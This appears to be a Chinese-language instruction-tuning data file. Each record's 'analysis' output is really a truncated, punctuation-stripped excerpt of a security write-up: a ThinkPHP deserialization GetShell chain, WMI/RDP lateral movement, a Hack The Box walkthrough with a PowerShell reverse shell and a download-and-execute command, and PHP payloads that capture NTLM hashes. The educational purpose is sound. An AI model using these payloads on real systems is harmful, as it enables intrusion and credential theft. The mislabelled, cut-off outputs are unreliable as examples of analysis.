{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n日常审计任务记录一下 审计 某套短视频点赞诈骗平台的GetShell组合拳TP3反序列化实战  打开看到源码很明显就是ThinkPHP v3.2.x的目录结构  查看框架入口文件里的 THINK_VERSION 发现是3.2.3版本 一些旧的框架版本的注入也都被修复了寻找注入无果于是开始其他漏洞的挖掘 任意Session操作 文件 /Application/Api/Controller/AlipayController.class.php  这里的 session() 是ThinkPHP提供的功能是可以操作session 那么这里的利用思路就很清晰了利用seesion操作模拟管理员的session进行后台登陆 接着去看了一下后台控制器的基类 文件 /Application/Common/Controller/AdminBaseController.class.php  这里可以看到Admin的基类对权限的控制使用的是ThinkPHP封装好的验证类跟进去看了一下非常复杂网上也没看到分析文章实在 不想继续分析于是往下走了点弯路 由于前台用户是需要注册的而注册又是需要邀请码的在没有邀请码的情况下是没有办法注册的也就没办法调用前台的一些功能点 对审计工作造成了局限性但是这里有一个Session操作的漏洞就不一样了我们可以通过操作Session登陆一个前台账号 前台用户控制器的基类 文件 /Application/Common/Controller/HomeBaseController.class.php   基本就是通过 $this->is_login() 来判断是否登陆   可以看到只要 $_SESSION['member']['id']>0 即可 这时候我们就可以使用前台的所有功能点了 Phar反序列化 就在前两天我在团队的公众号公开了一条 ThinkPHP v3.2.* 的一条pop链ThinkPHP v3.2.* SQL注入&文件读取反序列化POP链当前审 计的源码的框架版本正好也在版本中于是开始尝试挖掘反序列化 经过一轮全局搜索 unserialize( 无果后我开始尝试使用Phar反序列化 全局搜索 (fileatime|filectime|file_exists|file_get_contents|file_put_contents|file|filegroup|fopen|fileinode|filemtime|fileowner|file perms|is_dir|is_executable|is_file|is_link|is_readable|is_writable|is_writeable|parse_ini_file|copy|unlink|stat|readfile)\\(( .*?)\\$(.*?)\\) 寻找可控协议的文件操作函数 文件 /Application/Home/Controller/QrcodeController.class.php  可以看到这里有一个 file_get_contents() 函数里面的参数是我们完全可控的所以这里是可以触发phar反序列化的 本地搭建一下环境测试  生成测试用的phar文件  触发Phar反序列化   成功通过反序列化就可以读取目标的数据库配置文件然后通过数据库操作进行添加用户或者读取密码等操作最终进入后台 后台GetShell 现在进入后台了可以审计的点就又多了首先先查看上传的代码 把所有的上传逻辑都看完了但是都做了白名单无法进行绕过所以开始寻找其他可GetShell的点 文件 /Application/Admin/Controller/SystemConfigController.class.php  这里调用了 SystemConfigModel::set 跟过去看看  发现调用的是ThinkPHP的 F() 函数熟悉ThinkPHP的师傅们应该知道这个函数是用来缓存一些数据的如字符串数组等而缓存的方式是将数据序列化后存入 一个PHP文件中所以我们可以使序列化后的字符串存在一个php后门完成GetShell 利用 经过审计后一整套的组合拳就出来了 1. 通过操作Session登陆任意前台用户  2. 通过报错界面获取WEB路径  3. 生成利用恶意Mysql客户端任意文件读取漏洞获取数据库配置文件的phar文件  4. 上传phar文件到服务器  5. 触发反序列化读取数据库配置文件   6. 生成与目标数据库服务器配置相同配置的phar文件并上传   7. 触发反序列化进行SQL注入  8. 读取后台账号密码并解密或者插入一条后台管理员账号  9. 登陆后台使用漏洞GetShell  最后 这篇其实就是前两天发的TP3反序列化利用链的实战篇实战打起来其", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# OpenSSL 心脏出血漏洞CVE-2014-0160 心脏出血是OpenSSL库中的一个内存漏洞攻击者利用这个漏洞可以服务到目标进程内存信息如其他人的Cookie等敏感信息 参考链接 - https://heartbleed.com/ - https://filippo.io/Heartbleed ## 环境搭建 运行如下命令启动一个使用了OpenSSL 1.0.1c的Nginx服务器 ``` docker compose up -d ``` 环境启动后访问`https://your-ip:8443`即可查看到hello页面需要忽略https错误 > 我们在运行这个环境的时候遇到过一个错误部分AMD架构的CPU无法成功访问https页面如果你也遇到过类似的问题可以换Intel CPU试试 ## 漏洞复现 访问<https://filippo.io/Heartbleed>进行在线检测 ![](1.png) Python运行[ssltest.py](ssltest.py)拿到敏感数据Cookie ![](2.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nT1047: WMI for Lateral Movement 参考Windows管理规范 Windows管理规范英语Windows Management Instrumentation缩写WMI由一系列对 Windows Driver Model的扩展组成它通过仪器组件提供信息和通知并提供了一个操作系统的 接口WMI是微软对分布式管理工作组DMTF的基于Web的企业管理类WBEM和通用信 息模型CIM标准的实现 简单的说下重点 允许使用脚本语言VBScript 或Powersehll管理本地或远程服务器和个人电脑 预转在Windows 2000以后的所有Windows 系统中包括Windows Server 系列 服务默认自动启动 Micrsoft 提供了一个 Windows Management Instrumentation Command-line (wmic)的命令行界 面 你可能注意到提示wmic已启用那么官方推荐使用什么呢 Get-WmiObject ,在笔者的另一篇 WMI中有介绍该命令 Execution 确认目标\"Windows Management Instrumentation\"已开启服务名称 winmgmt ,可使用 net start winmgmt 开启服务 Observations 在目标主机cmd 的父进程是 WmiPrvSE.exe ,而 WmiPrvSE.exe 是在 services.exe 下 检查wmic 客户端当前sysmon和Windows 安全日志 wmic /node:OWA2010SP3 /user:administrator@0day.org /password:Admin!@#45 process call create \"cmd.exe /c calc\" #如无法使用主机名请配置为ip 原文用的kibana搜索 calc* 可查看相关日志这里用的自带的事件查看器 和winRM一样3次Logon事件4648显示凭据登录事件详细信息内显示了用户名目标主 机名 如果配置了sysmon也可以在sysmon中查看对应的日志 注笔者当前的wmic客户端为配置 winlogbeat所有相关日志无法在Kibana上查看 可看到 OWA2010SP3 上4624事件 T1076: RDP Hijacking for Lateral Movement with tscon 先上效果整个过程无需密码 Execution 参考tscon 渗透技巧利用tscon实现未授权登录远程桌面 tscon.exe 作用连接到远程桌面会话主机服务器上的另一个会话的工具 我这里不是远程但是RDP 情况下相同用大白话说下tscon的功能切换会话 tscon {<SessionID> | <SessionName>} [/dest:<SessionName>] [/password:<pw> | /password:*] [/v] 注您必须拥有完全控制访问权限或连接特别访问权限才能连接到另一个会话 完全控制访问权限是什么System用户的权限 在任务管理器中用户一栏中也能够切换会话到另一个用户输入密码即可成功切换 虽然显示相同两个用户名不是同一个用户一个是本地用户一个是域用户 简单说下 tscon 命令的一些重点 如果当前用户是管理员用户High 完整性指定密码即可成功切换 tscon 2 /password:Admin12345 如果当用户是 System 用户无需指定密码就能切换到其他用户 tscon 2 /dest:console 如果当前用户是 标准用户 则无法使用 tscon 切换到其他用户其他标准用户和管理员用户) 我这样描述应该对所谓的有完全控制权限有了理解实际测试中更多的以RDP为主下面的演示都是 基于RDP RDP Hijacking 的一些条件: Hijacking 的目标用户 是状态 断开连接直接RDP输入断开连接注销之后不会看到断开连接 Hijacking 的目标用户 需要本身就可以RDP如果目标用户无法RDP则劫持失败 那么怎样才能RDP?这里请教了很久 可能和系统版本有关Windows Server 2008 R2 测试成功在Windows 10 测试失败具体失败 情况为 成功切换了 Session 但是需要密码 以上条件之间是 and 关系 实现RDP Hijacking 的几种方式 系统权限的 tscon 使用管理员账户新建服务 mimikatz Powershell PsExec.exe -accepteula -s cmd #注意Event 4697Event 7045Event 4624和Event 4652 日志 #将权限提升至 System query user tsc", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMySQL高交互反制蜜罐实践 0x00 背景 MySQL客户端任意文件读取漏洞由来已久近年来由于护网的兴起基于该漏洞的MySQL反制蜜罐 也频繁出现然而很多商业蜜罐都是基于一些开源的验证性脚本进行开发见参考链接以这个完成 度来钓红队简直是在侮辱红队的智商那么MySQL反制蜜罐从PoC到工程化实践中要解决哪些坑呢咱 们今天来一一介绍 0x01 PoC的局限 MySQL读文件漏洞的原理网上有一大把分析文章这里就不再赘述了先来简单看一个典型的PoC 的执行流程如下图客户端登录后向服务端发送查询请求之后服务端返回了读文件的响应客户端 乖乖就范把文件发给了服务端此时一般情况下服务端应该返回一个 OK_PACKET 作为响应当然客户 端收到 OK_PACKET 之后会打印一串类似 Query OK, 0 rows affected (0.00 sec) 的文本出来我一 个select语句你给我返回 0 rows affected 无论如何是说不过去的所以这里直接断开连接假装成一 个服务不太稳定的MySQL 看到这里相信你已经看出来了这个PoC每次查询只能读取一个文件而且读完之后会断开连接 犹如掩耳盗铃这两个限制导致很多MySQL反制蜜罐沦为红队智商检测器在实战中几乎发挥不出作 用那么我们如何解除这两个限制呢答案还得从MySQL协议说起 0x02 一次读多个文件 MySQL协议中详细描述了一次查询请求 COM_QUERY 增删改查等都属于查询请求的执行流程 如下图 对于 COM_QUERY 服务端可能有四种响应 表格数据 ERR_PACKET( 0xFF 客户端收到后会打印 ERROR 1064 (42000): blabla.... ) OK_PACKET( 0x00 , 客户端收到后会打印 Query OK, 0 rows affected (0.00 sec) blabla... ) 需要本地文件( 0xFB 客户端收到后会发送对应的文件) 对于 0xFB 响应客户端发送完本地数据之后服务端需要响应 ERR_PACKET 或者 OK_PACKET 来 表明数据处理成功或者处理出错这里协议没有写清楚的是如果此时服务端发送的不是 OK/ERR 而是 一个表格数据响应甚至是 0xFB 读文件响应客户端要如何处理呢简单验证一下可以看到客户端仍 然把它当作一个正常的响应进行数据展示或者发送文件这样的话事情一下子就有意思了起来我们 稍微优化一下前面的PoC执行流程如下图 服务端在接收到文件之后可以立即再发送一个 0xFB 读文件响应如此反复一次查询就可以读完所有所 需文件最后再发送一个表格数据的响应作为结束让客户端展示以此来掩盖中间的执行流程 0x02 高交互 前面提到服务端在接收到文件以后可以返回一个表格数据响应客户端会展示这个表格那么如何构 造这个表格才能伪装地更像一个真实地MySQL服务呢答案就是把SQL查询代理到真正的MySQL服务 参考HTTP 代理的思路我们可以实现这样一个MySQL代理 非查询请求握手登录等直接转发到服务器处理 拦截查询请求并发送读文件响应可循环多次读取 文件读取结束后再转发对应的请求到真正的MySQL服务处理 这样一个高交互高隐匿可反制的MySQL蜜罐基本架构就出来了 0x04 其他小细节与最终demo 当然实际写代码肯定不会跟画图一样简单实现过程中还有很多小问题要考虑 1. 拦截请求时MySQL协议中请求编号的处理 2. SSL加密请求的处理MySQL高版本默认开启了SSL加密可以手动关闭或者在代理上替换掉证 书 3. 可以在MySQL握手阶段修改一些标志位让客户端发送客户端版本操作系统本机用户名之类的 信息 4. 读文件时如果读到不存在的文件客户端不会继续处理接下来的 OK_PACKET 和表格数据而且会 打印一个文件不存在的报错但是可以用一个 ERR_PACKET 配合一个合适的报错信息比如错误 代码1040, Too many connections来掩盖这个报错 最后综合以上所有要素我用GoLang写了一个简单的demo出来执行效果如图源码可以私信我获 取~ 0x05 红队如何防范 经过不同版本MySQL客户端与链接库的测试对比最后发现JDBC在很古老的版本就已经解决这个问 题了MySQL和MariaDB在新版本MySQL 8.0Mariadb 10.3.1x也解决了这个问题然而Navicat 最新版现在仍然在使用libmariadb 10.1.46.0受该问题影响所以不要用Navicat它会让你变得不 幸 0xFF 参考链接 [1] MysqlHoneypot [2] Rogue MySql Server [3] Hfish 中的 MySQL 蜜罐 [4] MySQL蜜罐获取攻击者微信ID [5] CS", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nports=$(nmap -p- --min-rate=1000 -T4 10.10.10.27 | grep [0-9] | cut -d '/' -f 1 | tr '\\n' ',' | sed s/,$//) nmap -sC -sV -p$ports 10.10.10.27 //-sC //-sV   hack the box-Archetype 0x00 0x01  <DTSConfiguration> <DTSConfigurationHeading> <DTSConfigurationFileInfo GeneratedBy=\"...\" GeneratedFromPackageName=\"...\" GeneratedFromPackageID=\"...\" GeneratedDate=\"20.1.2019 10:01:34\"/> </DTSConfigurationHeading> <Configuration ConfiguredType=\"Property\" Path=\"\\Package.Connections[Destination].Properties[ConnectionString]\" ValueType=\"String\"> <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue </Configuration> </DTSConfiguration> Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\\sql_svc;Initial  select is_srvrolemember('sysadmin'); //is_srvrolemember EXEC sp_configure 'Show Advanced Options', 1; reconfigure; sp_configure; EXEC sp_configure 'xp_cmdshell', 1 reconfigure; xp_cmdshell \"whoami\" 0x02 mssql 0x03 $client = New-Object System.Net.Sockets.TCPClient(\"10.10.14.3\",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data python3 -m http.server 80 nc -lvnp 443 ufw allow from 10.10.10.27 proto tcp to any port 80,443 //80443 xp_cmdshell \"powershell \"IEX (New-Object Net.WebClient).DownloadString(\\\"http://10.10.14.163/shell.ps1\\\");\" //ps type C:\\Users\\sql_svc\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadline\\ConsoleHost_history.txt   cd \\Users\\Administrator\\Desktop type root.txt 0x04", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1036-004-win-伪装服务或任务 ## 来自ATT&CK的描述 攻击者可能会尝试修改任务或服务的名称使其看起来合法或良性由任务调度程序或 systemd 执行的任务或服务通常会被赋予名称或描述Windows 服务展示服务名称存在许多具有共同关联名称的良性任务和服务攻击者可能会给出与合法任务或服务相似或相同的名称 任务或服务包含攻击者可能试图使其看起来合法的其他字段例如描述 ## 测试案例 ### 使用schtasks创建类似W32Time名称的服务 攻击命令用命令提示符运行需要提升等级如root或admin ``` schtasks /create /ru system /sc daily /tr \"cmd /c powershell.exe -ep bypass -file c:\\T1036.004_NonExistingScript.ps1\" /tn win32times /f schtasks /query /tn win32times ``` 清理命令 ``` schtasks /tn win32times /delete /f ``` ### 使用sc创建W32时间相似命名服务 攻击命令用命令提示符运行需要提升等级如root或admin ``` sc create win32times binPath= \"cmd /c start c:\\T1036.004_NonExistingScript.ps1\" sc qc win32times ``` 清理命令 ``` sc delete win32times ``` ## 检测日志 Windows安全日志/Sysmon日志 ## 测试复现 ### 使用schtasks创建类似W32Time名称的服务 ``` C:\\Windows\\system32>schtasks /create /ru system /sc daily /tr \"cmd /c powershell.exe -ep bypass -file C:\\Users\\zhuli\\Desktop\\TevoraAutomatedRTGui\\atomic-red-team-master\\atomics\\T1036.004\\test.ps1\" /tn win32times /f 成功: 成功创建计划任务 \"win32times\" C:\\Windows\\system32>schtasks /query /tn win32times 文件夹: \\ 任务名 下次运行时间 模式 ======================================== ====================== =============== win32times 2022/1/11 16:39:00 就绪 C:\\Windows\\system32>schtasks /tn win32times /delete /f 成功: 计划的任务 \"win32times\" 被成功删除 ``` ### 使用sc创建W32时间相似命名服务 ``` C:\\Windows\\system32>sc create win32times binPath= \"cmd /c start C:\\Users\\zhuli\\Desktop\\TevoraAutomatedRTGui\\atomic-red-team-master\\atomics\\T1036.004\\test.ps1\" [SC] CreateService 成功 C:\\Windows\\system32>sc qc win32times [SC] QueryServiceConfig 成功 SERVICE_NAME: win32times TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 3 DEMAND_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : cmd /c start C:\\Users\\zhuli\\Desktop\\TevoraAutomatedRTGui\\atomic-red-team-master\\atomics\\T1036.004\\test.ps1 LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : win32times DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\\Windows\\system32>sc delete win32times [SC] DeleteService 成功 ``` ## 日志留痕 ### 使用schtasks创建类似W32Time名称的服务 ``` 日志名称: Microsoft-Window", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSteinthor Bjarnason Jason Jones Arbor Networks The call is coming from inside the house! Are you ready for the next evolution in DDoS attacks? 2 The Promises of IoT  The Promise of IoT  More personalized, automated services  Better understanding of customer needs  Optimized availability and use of resources  Resulting in:  Lower Costs  Improved Health  Service / efficiency gains  Lower environmental impact 3 The IoT Problem  Security  To fulfill these premises, IoT devices are usually:  Easy to Deploy  Easy to Use  Require Minimal Configuration  Low Cost  However 4 Unprecedented DDoS attack sizes The Results: Large Scale Weaponization of Vulnerable IoT Devices Mirai infections December 2016  1M login attempts from 11/29 to 12/12 from 92K unique IP addresses  More than 1 attempt per minute in some regions 5 The Situation Today  An unprotected IoT device on the Internet will get infected within 1 minute.  An IoT device located behind a NAT device or a Firewall is not accessible from the Internet and is therefore (mostly) secure.  But early 2017, this all changed http://marketingland.com/wp-content/ml-loads/2014/09/iceberg-ss-1920.jpg 6 WINDOWS-BASED IoT INFECTION 7 Background  Desktop malware spreading multi-platform malware is not new  Increasingly common technique amongst both targeted malware and crimeware, primarily focusing on mobile devices  HackingTeam RCS  WireLurker  DualToy  BackStab campaign  Banking trojans will also target mobile devices to steal 2FA / SMS authorization codes  May consist of a side-load installation or tricking a user to click a link on their phone  IOT devices present a new and ripe infection vector  Windows Mirai is the first known multi-platform trojan to target IoT devices for infection 8 Windows Mirai  Initially reported on in early 2017 by PAN  Later reported on by multiple organizations  Not truly a Windows version of Mirai, spread other Linux / IoT malware previously  Discovered samples dating back to at least March 2016  Earliest", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# DC3-WalkThrough --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- **靶机地址** - https://www.vulnhub.com/entry/dc-3,312/ **Description** DC-3 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. As with the previous DC releases, this one is designed with beginners in mind, although this time around, there is only one flag, one entry point and no clues at all. Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools. For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward. For those with experience doing CTF and Boot2Root challenges, this probably won't take you long at all (in fact, it could take you less than 20 minutes easily). If that's the case, and if you want it to be a bit more of a challenge, you can always redo the challenge and explore other ways of gaining root and obtaining the flag. **Technical Information** DC-3 is a VirtualBox VM built on Ubuntu 32 bit, so there should be no issues running it on most PCs. Please note: There was an issue reported with DC-3 not working with VMware Workstation. To get around that, I recommend using VirtualBox, however, I have created a separate DC-3 VMware edition for those who can only use VMware. It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP. Installation is simple - download it, unzip it, and then import it into VirtualBox and away you go. **知识点** - Joomla SQL 注入 (中期) - john 跑 hash (中期) - web 命令执行 (中期) - CVE-2016-4557 提权 (后期) **实验环境** `环境仅供参考` `!!!注意,VMware 环境需要下载一个单独的 DC-3 VMware 版本!!!` - VMware Workstation 15 Pro - 15.0.0 build-10134415 - kali : NAT 模式,192.168.141.134 - 靶机 : NAT 模式 --- # 前期-信息收集 开始进行 IP 探", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTime-Based Blind SQL Injection using Heavy Queries A practical approach for MS SQL Server, MS Access, Oracle and MySQL databases and Marathon Tool Authors: Chema Alonso, Daniel Kachakil, Rodolfo Bordón, Antonio Guzmán y Marta Beltrán Speakers: Chema Alonso & José Parada Gimeno Abstract: This document describes how attackers could take advantage of SQL Injection vulnerabilities taking advantage of time-based blind SQL injection using heavy queries. The goal is to stress the importance of establishing secure development best practices for Web applications and not only to entrust the site security to the perimeter defenses. This article shows exploitation examples for some versions of Microsoft SQL Server, Oracle DB Engine, MySQL and Microsoft Access database engines, nevertheless the presented technique is applicable to any other database product in the market. This work is accompanied by a tool to prove the technique. Time-Based Blind SQL Injection using heavy queries & Marathon Tool Page 1 of 12 Index Section Page 1. INTRODUCTION 02 2.TRICKS FOR TIME DELAYS4 03 2.1 Microsoft SQL Server 2000/2005 04 2.2 Microsoft Access 2000 06 2.3 MySQL 5 07 2.4 Oracle 08 3 . HEAVY QUERIES 08 4. MARATHON TOOL 09 4.1 Configuration Section 09 4.2 Database Schema 11 4.3 Debug Log Section 11 References 12 Authors 12 Time-Based Blind SQL Injection using heavy queries & Marathon Tool Page 2 of 12 1. INTRODUCTION The first reference to blind attacks using SQL queries was introduced by Chris Anley in June 2002 ([1]). In this paper the author calls attention to the possibility of creating attacks to avoid the database error processing by searching a binary behavior in systems responses. This work proposes a blind security analysis in which the analyzer had to infer how to extract the information building up SQL queries from which the only possible responses will be true or false. Furthermore, different methods to determine when to consider a system response as true or false are proposed. Amo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIntroduction DNS Security Issues Passive DNS hardening DNSDB Passive DNS Hardening Robert Edmonds Internet Systems Consortium, Inc. Robert Edmonds Passive DNS Hardening Introduction DNS Security Issues Passive DNS hardening DNSDB DNS Passive DNS ISC SIE Structure of this talk  Introduction  DNS  Passive DNS  ISC SIE  DNS security issues  Kashpureff poisoning  Kaminsky poisoning  Passive DNS security issues  Record injection  Response spoofing  ISC DNSDB  Architecture  Demos Robert Edmonds Passive DNS Hardening Introduction DNS Security Issues Passive DNS hardening DNSDB DNS Passive DNS ISC SIE The Domain Name System  The DNS maps hostnames to IP addresses.  More generally, it maps (key, type) tuples to a set of unordered values. again, we can think of the DNS as basically a multi-value distributed key-value store. Robert Edmonds Passive DNS Hardening Introduction DNS Security Issues Passive DNS hardening DNSDB DNS Passive DNS ISC SIE Clients, caches, content  Clients request full resolution service from caches.  Caches make zero or more inquiries to DNS content servers on behalf of clients. Results are cached for a limited time to serve future client requests.  Content nameservers serve DNS records for zones that have been delegated to them. Robert Edmonds Passive DNS Hardening Introduction DNS Security Issues Passive DNS hardening DNSDB DNS Passive DNS ISC SIE DNS Caching Resolvers gtisc.gatech.edu Facebook.com Google.com amazon.com .org .isc.org .com .net Dozens Millions Millions Clients Content Query Response Query Response Query Response Query Response Robert Edmonds Passive DNS Hardening Introduction DNS Security Issues Passive DNS hardening DNSDB DNS Passive DNS ISC SIE Client-server and inter-server DNS protocols  The DNS is actually two different protocols that share a common wire format.  The client-to-server protocol spoken between clients and caches.  The inter-server protocol spoken between caches and content servers.  Passive DNS focuses on the latter. Rob", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAuthor: pen4uin 0x00 写在前面 0x01 获取Net-NTLM Hash 0x02 可利用的函数 01 include() 02 include_once() 03 require() 04 require_once() 05 file_get_contents() 06 file() 07 readfile() 08 file_exists() 09 filesize() 10 unlink() 11 fopen() 12 is_file() 13 file_put_contents()  xxx() 0x03 可能出现的漏洞场景 SSRF file:// XXE php://filter 文件包含 文件删除 文件下载 文件读取 0x04 NTLM利用姿势 暴力破解 0x00 写在前面 相信大家也都有看过一些关于获取Net-NTLM Hash文章但是我感觉利用场景都更偏向于已突破网 络边界的情况(比如社工钓鱼/RCE等手段)于是在这篇文章里我针对一些常见的Web场景 (PHP+Window)下对获取Net-NTLM Hash姿势的进行了测试目前自己还未在实战场景测试不知道效 果如何师傅们就当作扩展思路吧 0x01 获取Net-NTLM Hash 使用Responder获取Net-NTLM Hash git clone https://github.com/lgandx/Responder.git cd Responder/ ./Responder.py -I eth0 -rv 0x02 可利用的函数 测试了大概20+的函数这里仅以下面的demo演示效果 01 include() <?php include '\\\\\\\\10.10.10.3\\tmp'; 02 include_once() 03 require() <?php include_once '\\\\\\\\10.10.10.3\\tmp'; <?php require '\\\\\\\\10.10.10.3\\tmp'; 04 require_once() <?php require_once '\\\\\\\\10.10.10.3\\tmp'; 05 file_get_contents() <?php $demo = file_get_contents('\\\\\\\\10.10.10.3\\tmp'); 06 file() <?php $lines = file('\\\\\\\\10.10.10.3\\tmp'); 07 readfile() 08 file_exists() <?php $file = '\\\\\\\\10.10.10.3\\tmp'; readfile($file); <?php $file = '\\\\\\\\10.10.10.3\\tmp'; if (file_exists($file)) { exit; } 09 filesize() <?php $demo = filesize('\\\\\\\\10.10.10.3\\tmp'); 10 unlink() <?php $file = '\\\\\\\\10.10.10.3\\tmp'; unlink($file); 11 fopen() <?php $file = '\\\\\\\\10.10.10.3\\tmp'; fopen($file,'a'); 12 is_file() 同类函数还有 <?php $file = '\\\\\\\\10.10.10.3\\tmp'; var_dump(is_file($file)); is_dir() is_executable() is_link() is_readable() is_uploaded_file() is_writable() is_writeable() 13 file_put_contents()  xxx() 可达到以上效果的函数还有很多这里就不再测试了重在思路分享 下面将列举几种实战中可能会出现的场景 0x03 可能出现的漏洞场景 注以下只是为了演示效果所以demo代码过于简单 <?php $file = '\\\\\\\\10.10.10.3\\tmp.txt'; file_put_contents($file, 'pen4uin.'); SSRF demo.php file:// payload <?php $location=$_GET['path']; $curl = curl_init($location); curl_exec ($curl); curl_close ($curl); ?> ?path=file://\\\\10.10.10.3\\tmp XXE 靶场 https://github.com/c0ny1/xxe-lab php://filter payload 文件包含 demo.php ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nInvest in security to secure investments How to hack VMware vCenter server in 60 seconds Alexander Minozhenko #whoami  Pen-tester at Digital Security  Researcher  DCG#7812 / Zeronights  CTF  Thanks for ideas and support to Alexey Sintsov 2 What do pen-testers do?  Scanning  Fingerprinting  Banner grabbing  Play with passwords  Find vulns.  Exploit vulns.  Escalate privs.  Dig in  Find ways to make attacks  And e.t.c. 3 Find vulns.  Static  Source code review  regexp  formal methods  hand testing  Reverse Engineering  formal methods  hands  Dynamic  Fuzzing (bin/web) + Typical bugs for class + Reverse Engineering  Hand testing  Architecture Analysis (Logic flaws)  Use vuln. Database (CVE/exploit-db/etc) 4 Pen-tester env. Tasks:  pwn target 8)  show most dang. vulns.  show real attacks and what an attacker can do Time: Not much ) Targets: Large number of targets, different types 5 Find vulns.  Static  Source code review  regexp  formal methods  hand testing  Reverse Engineering  formal methods  hands  Dynamic  Fuzzing (bin/web) + Typical bugs for class + Reverse Engineering  Hand testing  Architecture Analysis (Logic flaws)  Use vuln. Database (CVE/exploit-db/etc) 6  BlackBox  Not much time Target 7 VMware vCenter Server  VMware vCenter Server is solution to manage VMware vSphere  vSphere  virtualization operating system 8 Target  Vmware vCenter version 4.1 update 1  Services:  Update Manager  vCenter Orchestrator  Chargeback  Other  Each services has web server 9 CVE-2009-1523  Directory traversal in Jetty web server  http://target:9084/vci/download/health.xml/%3f/../../../../FILE  Discovered by Claudio Criscione  But Fixed in VMware Update Manager 4.1 update 1 :( 10 Directory traversal..again?  Directory traversal in Jetty web server  http://target:9084/vci/download/.%5C..%5C..%5C..%5C..%5C..% 5C..%5C..%5C..\\FILE.EXT  Discovered by Alexey Sintsov  Metasploit module vmware_update_manager_traversal.rb by sinn3r 11 Directory traversal  What file to read?  Claudio Crisc", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRelocation Bonus Attacking the Windows Loader Makes Analysts Switch Careers 1 / 67 Introduction Relocation Bonus - Introduction 2 / 67 Introduction Nick Cano Relocation Bonus - Introduction 2 / 67 Introduction Nick Cano 25 years old Relocation Bonus - Introduction 2 / 67 Introduction Nick Cano 25 years old Senior Security Architect at Cylance Relocation Bonus - Introduction 2 / 67 Introduction Nick Cano 25 years old Senior Security Architect at Cylance Author of Game Hacking: Developing Autonomous Bots for Online Games Relocation Bonus - Introduction 2 / 67 Introduction Nick Cano 25 years old Senior Security Architect at Cylance Author of Game Hacking: Developing Autonomous Bots for Online Games Pluralsight Instructor, Modern C++ Secure Coding Practices: Const Correctness Relocation Bonus - Introduction 2 / 67 Introduction Nick Cano 25 years old Senior Security Architect at Cylance Author of Game Hacking: Developing Autonomous Bots for Online Games Pluralsight Instructor, Modern C++ Secure Coding Practices: Const Correctness Relocation Bonus Relocation Bonus - Introduction 2 / 67 Introduction Nick Cano 25 years old Senior Security Architect at Cylance Author of Game Hacking: Developing Autonomous Bots for Online Games Pluralsight Instructor, Modern C++ Secure Coding Practices: Const Correctness Relocation Bonus A look into the Windows Portable Executable (PE) header and how it can be weaponized to destroy parsers, disassemblers, and other tools Relocation Bonus - Introduction 2 / 67 Introduction Nick Cano 25 years old Senior Security Architect at Cylance Author of Game Hacking: Developing Autonomous Bots for Online Games Pluralsight Instructor, Modern C++ Secure Coding Practices: Const Correctness Relocation Bonus A look into the Windows Portable Executable (PE) header and how it can be weaponized to destroy parsers, disassemblers, and other tools A PE rebuilder that takes any 32bit PE then obfuscates and rebuilds it using the attack Relocation Bonus - Introduction ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2008 Security-Assessment.com SCADA Fear, Uncertainty, and the Digital Armageddon Presented By Morgan Marquis-Boire  2007 Security-Assessment.com Whois Hi, My Name is Morgan  2007 Security-Assessment.com Whois Hi, My Name is Morgan Im a security guy  2007 Security-Assessment.com Whois Hi, My Name is Morgan Im a security guy Security-Assessment.com  2007 Security-Assessment.com Introduction Security-Assessment.com Independent security consultancy; no sales, no products, no fixing the things we break NZs largest & most experienced security team Experienced with large, critical networks Banks, airlines, government, telco and utility Paid to think like hackers, and break things like hackers  2007 Security-Assessment.com Introduction So Whats a SCADA and where can I get one? What is it? Why is it so hip right now?  2007 Security-Assessment.com SCADA Basics SCADA - Supervisory Control and Data Acquisition There is a tendency by the media to refer to all industrial control systems (ICS) as SCADA  2007 Security-Assessment.com SCADA Basics SCADA - Supervisory Control and Data Acquisition There is a tendency by the media to refer to all industrial control systems (ICS) as SCADA SCADA systems support processes that manage water supply and treatment plants Electrical power 